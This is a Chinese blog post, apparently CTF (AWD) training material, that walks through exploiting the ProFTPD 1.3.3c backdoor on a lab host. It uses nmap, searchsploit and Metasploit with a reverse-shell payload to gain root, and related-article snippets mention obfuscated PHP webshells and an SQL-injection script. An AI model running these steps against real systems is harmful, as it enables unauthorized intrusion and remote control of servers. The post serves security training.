AWD--攻防--FTP服务

最新推荐文章于 2024-02-05 11:29:44 发布
最新推荐文章于 2024-02-05 11:29:44 发布
阅读量578 收藏 3
点赞数 1
分类专栏: awd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/96009945
版权

一、基础知识
在这里插入图片描述二、开始渗透
老方法当然是查看主机开放的端口服务:

root@kali:~# nmap -sV 192.168.1.105

在这里插入图片描述我们开放了21号端口,看到了ftp的版本号。

searchsploit +版本

在这里插入图片描述path就是漏洞说明文件和漏洞利用文件:
ruby语言的文件。后缀为.rb,在这里我们可以用编辑器leafpad打开。
在这里插入图片描述
在这里插入图片描述

msf > search ProFTPD 1.3.3c //我们查看漏洞利用模块

在这里插入图片描述选择漏洞利用模块:

msf > use    exploit/unix/ftp/proftpd_133c_backdoor

这里有个疑问为什么我们要选择倒数第二个模块?因为我们可以看看后面的漏洞描述与我们一开始searchsploit查看的漏洞描述信息一样,所以我们就是用这种模块。
查看payloads

msf exploit(proftpd_133c_backdoor) > show payloads

在这里插入图片描述
设置payload:

msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse

在这里插入图片描述查看参数:

msf exploit(proftpd_133c_backdoor) > show options

在这里插入图片描述

设置对应的参数:
设置参数的时候一定要分清目标端口,本地端口,目标ip,本地ip
在这里插入图片描述执行漏洞:

msf exploit(proftpd_133c_backdoor) > exploit

在这里插入图片描述我们看到直接拿到了root权限。

metasploit中的

暮秋初九
关注
专栏目录
AWD----模式&准备&攻防&监控&批量
qi_SJQ_的博客
02-27 3659
1.前置知识: 1) 2)AWD 常见比赛规则说明: Attack With Defence:简而言之就是你既是一个 hacker,又是一个 manager。 比赛形式:一般就是一个 ssh 对应一个 web 服务,然后 flag 五分钟一轮,各队一般都有自己的初始分数,flag 被拿会被拿走 flag 的队伍均分,主办方会对每个队伍的服务进行 check,check 不过就扣分,扣除的分值由服务 check 正常的队伍均分。其中一半比赛以 WEB 居多,可能会涉及内网安全,当然还有pwn这些。 3)前.
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试题将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解题,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
awd php,AWD模式下的各类PHP木马
weixin_42099116的博客
03-28 715
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破混淆马:让木马内容难以识别 变换成
[详细完整版]新闻管理系统.doc
06-26
软件综合实习可选题目 1新闻管理系统 1.1 系统概述 新闻管理系统对新闻作了详细的分类,前台以分类形式显示新闻的详细信息,满足了 人们浏览新闻时分类查看新闻信息的要求,前台提供查询新闻信息的功能,方便浏览者 查找相关的新闻信息。后台由管理员进行管理维护,保证了网站的安全性。 1.2需求分析 新闻管理系统由前台新闻浏览和后台新闻管理两大部分组成,功能结构图如下所示: (一)前台主要功能 1、主页网站导航 主要包括网站的旗帜广告条、新闻分类导航和显示当前日期,如图1.2 所示。 图1.2 主页导航 2、新闻分类导航 在查询下方提供类别导航按钮,如图1.3所示。单击该类别按钮可以对不同类别的新 闻进行查看。点击新闻名称还可以对新闻的详细内容进行查看。 图1.3 新闻分类导航 3、站内新闻搜索 在主页面上方提供了查询功能,此查询支持模糊查询,如图1.4所示。在"输入关键字 "处输入要查询的部分关键字,在右侧下拉列表中选择新闻类别,单击"站内搜索"按钮, 下方将显示查询结果。 图1.4 站内新闻搜索 注意:此查询中按新闻内容进行查询,而不是新闻标题。 4、新闻分类显示 主要包括分类显示新闻类别
java 新闻发布管理系统 新闻管理系统 新闻发布系统 jsp ssm web
10年大厂开发经验,项目资料、毕设指导和技术答疑,欢迎咨询交流!
12-15 281
系统后台登陆、管理员信息管理、用户信息管理、新闻分类管理、新闻内容管理、用户评论管理、提示问题管理、意见反馈管理等功能。该新闻发布管理系统主要分为前台和后台两大模块,共包含两种角色,分别是:用户和管理员。后台框架:Spring、SpringMVC、MyBatis。新闻发布管理系统,基于SSM实现的新闻发布管理系统。UI界面:JSP、jQuery、H-ui。
CTF-AWD入门手册
Python栈
06-18 1275
今天给大家带来了AWD的入门知识点,AWD赛制也是CTF中常见的赛制,本文讲的AWD比赛中常见的知识点,可能会有许多的遗漏,望大家指出交流,如果对本文感兴趣不妨一键三连。CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享🎁😝朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,可以扫描下方二维码免费领取1️⃣零基础入门① 学习路线对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。② 路线对应学习视频。
2024.2.4 awd总结
2202_75317918的博客
02-05 697
本次awd 最前面还是挺顺的,后面查杀代码审计能力很弱然后只会盲打,也不知道怎么打,后面时间也不够了不会攻击。
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django ...
awd-platform(AWD攻防平台)
03-16
# AWD线下环境启动说明 by Hence Zhang @Lancet github上的项目,搬运了一下
awd-platform-master.zip
09-07
awd-platform-master.zip】是一个压缩包文件,包含了一个名为"awd-platform-master"的项目。这个项目主要用于搭建CTF(Capture The Flag)比赛中的AWD(Attack-Defend)训练平台。在网络安全领域,CTF是一种流行的...
【SSM】spring mvc+mybatis+Shiro+dwz实现的通用后台系统.zip
07-12
【SSM】spring mvc+mybatis+Shiro+dwz实现的通用后台系统.zip
多模块新闻管理
03-24
多模块新闻管理系统首页 欢迎使用sqlgun新闻发布系统。 sqlgun新闻发布系统 1.0 现有功能: 前台css布局! 后台无限分类html发帖! 安装说明: sqlgunnews.sql为数据库文件,mysql导入即可! 后台路径:admin/index.php 账号:admin 密码:admin
F-TYPE R models with AWD drive system
07-28 158
In addition, 16 years of Formula F-TYPE R models also upgrade the new AWD drive system, this system combines a new...
CTF线下赛AWD总结
热门推荐
YICONGITSME的博客
09-20 3万+
AWD     记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。 缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。 感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入...
sql注2bugku脚本
静水流深,沧笙踏歌
05-22 251
import requests,re post_url='http://123.206.87.240:8007/web2/login.php' s = requests.session() asc=[48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102] flag='b' passwd='d' for i in range(1,33): ...
Kali Linux 渗透测试之主动收集(主机发现)
weixin_43803070的博客
05-26 681
为什么识别操作系统呢? 因为操作系统安装之后默认情况下会开放端口,我们可以根据扫描操作系统的版本知道默认开放的服务和端口。 原理: 通过ttl值识别,不同类型的操作系统起始值是不同的,win的ttl是128(65-128)(1-64)是Linux活unigx,某些特殊的版本可能是255。每次经过一个路由器ttl会减一。所以根据数据包发送的目标地址,在目标主机上抓取收到的数据包的ttl值可以判断数据...
kali启动awd比赛
weixin_43326436的博客
08-17 1213
2.python batch.py web_yunnan_simple 3 创建队伍3个。1.cd awd-platform 进入比赛项目。3.输入命令启动比赛。
CTF线下赛AWD攻防准备
qwzf
07-16 7438
CTF线下赛AWD攻防准备 最近发现一篇博客。感觉对CTF线下赛-AWD模式,总结比较好。于是学习了解了一下,为了方便寻找,把这篇博客复制了过来,并补充了点。。。 1、赛制流程:攻防模式(AWD)常见于线下攻防 一般比赛的具体环境会在开赛前半个小时由比赛主办方给出,前半个小时应熟悉配置环境。准备网线、网线转接口。 最好的防御就是攻击,不做好安全加固就会被吊打。 2、 赛前准备: 常用工具:(整理...
kali删除awd-platform-master
最新发布
09-26
在Kali Linux系统中,如果你想删除名为"awd-platform-master"的软件包或者目录,可以按照以下步骤操作: 1. **确认要删除的内容**: 使用`apt-cache search awd-platform-master`检查是否能找到你要删除的具体内容...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值